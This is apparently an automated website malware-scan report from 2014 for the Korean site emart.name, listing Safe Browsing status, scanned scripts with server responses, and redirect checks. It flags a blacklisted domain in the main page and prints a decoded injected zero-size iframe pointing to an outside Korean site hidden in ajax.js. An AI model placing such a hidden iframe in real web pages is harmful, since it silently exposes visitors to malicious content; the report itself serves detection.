Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=emart.name
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://emart.name/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 20 Sep 2014 07:52:31 GMT Location: /main/main_emart.asp Server: Microsoft-IIS/6.0 Content-Length: 141 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=1411231951624911269; domain=emart.name; path=/ Set-Cookie: ASPSESSIONIDACQDBDQD=BKDGPDFCOGGLLGDGGIKMKDKJ; path=/ X-Powered-By: ASP.NET | clean |
http://emart.name/main/main_emart.asp | 200 OK Content-Length: 99699 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: itxpc.co.kr <html lang="ko" xml:lang="ko" xmlns="http://www.w3.org/1999/xhtml"> <head> <!-----------------------www.overture.co.kr------------------------------------------------ //--> <SCRIPT language="JavaScript" type="text/javascript"> <!-- Overture Korea window.ysm_customData = new Object(); window.ysm_customData.conversion = "transId=,currency=,amount="; var ysm_accountid ...[4374 bytes skipped]... | ||
http://emart.name/jscript/common.js | 200 OK Content-Length: 33910 Content-Type: application/x-javascript | clean |
http://emart.name/jscript/embed.js | 200 OK Content-Length: 2953 Content-Type: application/x-javascript | clean |
http://emart.name/jscript/ajax.js | 200 OK Content-Length: 3078 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. var ajax;
function Ajax(async) { this.XmlHttpReq = null; this.async = (typeof(async)=='undefined')?true:async; this.type = null; this.url = null; this.param = null; this.returnExec = null; this.iswait = false; this.encodeParam = function(value) { value = escape(value); value = value.replace(/\+/g, '%2B'); return value; } this.getXmlHttpRequest = ...[2571 bytes skipped]... Decoded script: <iframe src=http://www.jumprope.co.kr/mail/index.html width=0 height=0></iframe> | ||
http://emart.name/jscript/json.js | 200 OK Content-Length: 5093 Content-Type: application/x-javascript | clean |
http://emart.name/jscript/rollover.js | 200 OK Content-Length: 1033 Content-Type: application/x-javascript | clean |
http://emart.name/jscript/user_func.js | 200 OK Content-Length: 2641 Content-Type: application/x-javascript | clean |
http://emart.name/jscript/jquery-1.3.2-vsdoc2.js | 200 OK Content-Length: 106228 Content-Type: application/x-javascript | clean |
http://emart.name/jscript/jquery.autocomplete.js | 200 OK Content-Length: 13843 Content-Type: application/x-javascript | clean |
http://emart.name/jscript/floating.js | 200 OK Content-Length: 3485 Content-Type: application/x-javascript | clean |
http://emart.name/jscript/cookie.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
http://emart.name//seal.alphassl.com/SiteSeal/alpha_image_115-55_en.js/ | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://emart.name/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16780 Content-Type: application/javascript | clean |
http://emart.name/main/popup_main.js.asp | 200 OK Content-Length: 741 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: emart.name
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Sat, 20 Sep 2014 07:52:31 GMT
Location: /main/main_emart.asp
Server: Microsoft-IIS/6.0
Content-Length: 141
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=1411231951624911269; domain=emart.name; path=/
Set-Cookie: ASPSESSIONIDACQDBDQD=BKDGPDFCOGGLLGDGGIKMKDKJ; path=/
X-Powered-By: ASP.NET
...141 bytes of data.
GET / HTTP/1.1
Host: emart.name
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Sat, 20 Sep 2014 07:52:31 GMT
Location: /main/main_emart.asp
Server: Microsoft-IIS/6.0
Content-Length: 141
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=1411231951624911269; domain=emart.name; path=/
Set-Cookie: ASPSESSIONIDACQDBDQD=BKDGPDFCOGGLLGDGGIKMKDKJ; path=/
X-Powered-By: ASP.NET
...141 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: emart.name
Referer: http://www.google.com/search?q=emart.name
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: emart.name
Referer: http://www.google.com/search?q=emart.name
Result:
The result is similar to the first query. There are no suspicious redirects found.